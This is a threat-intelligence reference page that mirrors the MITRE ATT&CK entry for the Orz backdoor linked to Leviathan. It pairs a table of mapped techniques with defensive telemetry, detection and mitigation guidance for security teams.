S0229: Orz
Analyst context for executives and security teams
Orz matters because it is a custom JavaScript backdoor for Windows associated in ATT&CK with Leviathan and historical spearphishing activity involving Microsoft Publisher files. For leaders, the defensive value is not just the malware name; it is the behavior pattern: script-based backdoor execution, host discovery, registry interaction, tool transfer, command-and-control over web services, and stealth techniques that can make a compromised workstation useful for longer-running espionage activity.
Executive priority
Prioritize validation around Windows endpoint visibility, email/file handling for uncommon document delivery paths, and incident response readiness for backdoor activity that performs discovery and uses legitimate-looking system utilities. Because ATT&CK provides no official detection guidance for Orz, executives should ask whether coverage is behavior-based across the mapped techniques rather than dependent on a malware signature or a dated campaign indicator.
Technical view
SOC and IR teams should treat Orz as a Windows malware object with relationships to discovery, execution, command-and-control, persistence/defense evasion, and stealth behaviors. Validate telemetry for command shell use, Regsvr32 execution, registry modification, process discovery, system/network/file/software discovery, process hollowing indicators, ingress file transfer, and bidirectional web-service communication. Detection engineering should map alerts to the related ATT&CK techniques rather than relying on the Orz name alone.
Likely telemetry
- Windows process creation and command-line logging, especially cmd.exe and regsvr32.exe activity
- Endpoint detection data for script execution, process injection or process hollowing patterns, and suspicious parent-child process relationships
- Windows Registry modification events
- File creation, file download, and tool transfer evidence on endpoints
- DNS, proxy, firewall, and web traffic logs for external bidirectional communication patterns
Detection direction
- Build or validate behavior detections for the related techniques: T1059.003, T1218.010, T1112, T1055.012, T1102.002, T1105, T1016, T1057, T1082, T1083, T1518, T1027, and T1070.
- Tune for legitimate administrative use of cmd.exe, regsvr32.exe, registry tools, and discovery commands; the detection value is in unusual context, sequencing, parent process, destination, and user/system baseline deviation.
- Do not assume Orz-specific signatures are sufficient. ATT&CK does not provide official detection text for this object, so local validation should focus on whether the environment can observe the mapped behaviors.
- Check for blind spots around script content visibility, obfuscated files, signed Windows utility abuse, endpoint memory telemetry for hollowing, and network channels that blend into ordinary web traffic.
Mitigation priorities
- Start with visibility: ensure Windows endpoint, command-line, registry, file, email attachment, and network web/proxy telemetry are retained and searchable for investigations.
- Reduce execution risk from script and document-borne payloads through controlled handling of high-risk attachment types and enforcement of least privilege on workstations.
- Harden and monitor legitimate Windows utilities that can proxy execution, including Regsvr32 and command shell use, without assuming they can be fully blocked in all environments.
- Apply least privilege and change-control discipline around registry locations used for persistence or defense evasion.
- Prepare IR playbooks for backdoor cases that include scoping discovery activity, reviewing inbound tool transfers, and reconstructing command-and-control communications.
Analyst notes and limits
The most decision-relevant context is that Orz is a custom JavaScript backdoor used by Leviathan, observed historically in 2014 and in August 2017 when dropped by Microsoft Publisher files. ATT&CK relationships show a broad behavior set that should be used to guide control validation and detection coverage testing.
The supplied ATT&CK object does not include official detection guidance, aliases, labels, or object-level tactics. The relationship techniques provide behavioral direction, but environment-specific evidence is required to determine exposure, alert quality, and incident significance. No active exploitation or current campaign activity should be inferred from these fields alone.
Orz
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
Techniques used
This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.
| Domain | ID | Name | Relationship / procedure |
|---|---|---|---|
| Enterprise | T1083 | File and Directory Discovery | Orz can gather victim drive information.CitationProofpoint Leviathan Oct 2017 |
| Enterprise | T1059.003 | Windows Command Shell Sub-technique | |
| Enterprise | T1218.010 | Regsvr32 Sub-technique | Some Orz versions have an embedded DLL known as MockDll that uses Process Hollowing and regsvr32 to execute another payload.CitationProofpoint Leviathan Oct 2017 |
| Enterprise | T1102.002 | Bidirectional Communication Sub-technique | Orz has used Technet and Pastebin web pages for command and control.CitationProofpoint Leviathan Oct 2017 |
| Enterprise | T1057 | Process Discovery | Orz can gather a process list from the victim.CitationProofpoint Leviathan Oct 2017 |
| Enterprise | T1082 | System Information Discovery | Orz can gather the victim OS version and whether it is 64 or 32 bit.CitationProofpoint Leviathan Oct 2017 |
| Enterprise | T1070 | Indicator Removal | Orz can overwrite Registry settings to reduce its visibility on the victim.CitationProofpoint Leviathan Oct 2017 |
| Enterprise | T1518 | Software Discovery | Orz can gather the victim's Internet Explorer version.CitationProofpoint Leviathan Oct 2017 |
| Enterprise | T1105 | Ingress Tool Transfer | Orz can download files onto the victim.CitationProofpoint Leviathan Oct 2017 |
| Enterprise | T1112 | Modify Registry | Orz can perform Registry operations.CitationProofpoint Leviathan Oct 2017 |
| Enterprise | T1016 | System Network Configuration Discovery | Orz can gather victim proxy information.CitationProofpoint Leviathan Oct 2017 |
| Enterprise | T1055.012 | Process Hollowing Sub-technique | |
| Enterprise | T1027 | Obfuscated Files or Information | Some Orz strings are base64 encoded, such as the embedded DLL known as MockDll.CitationProofpoint Leviathan Oct 2017 |
Groups, software, and campaigns
G0065: Leviathan
Leviathan is a Chinese state-sponsored cyber espionage group that has been attributed to the Ministry of State Security's (MSS) Hainan State Security Department and an affiliated front company.[1] Active since at least 2009, Leviathan has targeted the following sectors: academia, aerospace/aviation, biomedical, defense industrial base, government, healthcare, manufacturing, maritime, and transportation across the US, Canada, Australia, Europe, the Middle East, and Southeast Asia.[1][2][3][4]
All related ATT&CK context
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates .
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | 2.2 | Current bundle | 7e28c3fc159d… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
-
[1]
Proofpoint Leviathan Oct 2017
Axel F, Pierre T. (2017, October 16). Leviathan: Espionage actor spearphishes maritime and defense targets. Retrieved February 15, 2018.
Open source URL -
[2]
FireEye Periscope March 2018
FireEye. (2018, March 16). Suspected Chinese Cyber Espionage Group (TEMP.Periscope) Targeting U.S. Engineering and Maritime Industries. Retrieved April 11, 2018.
Open source URL -
[3]
AIRBREAK
(Citation: FireEye Periscope March 2018)
-
[4]
Orz
(Citation: Proofpoint Leviathan Oct 2017)
-
[5]
mitre-attack S0229Open source URL
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.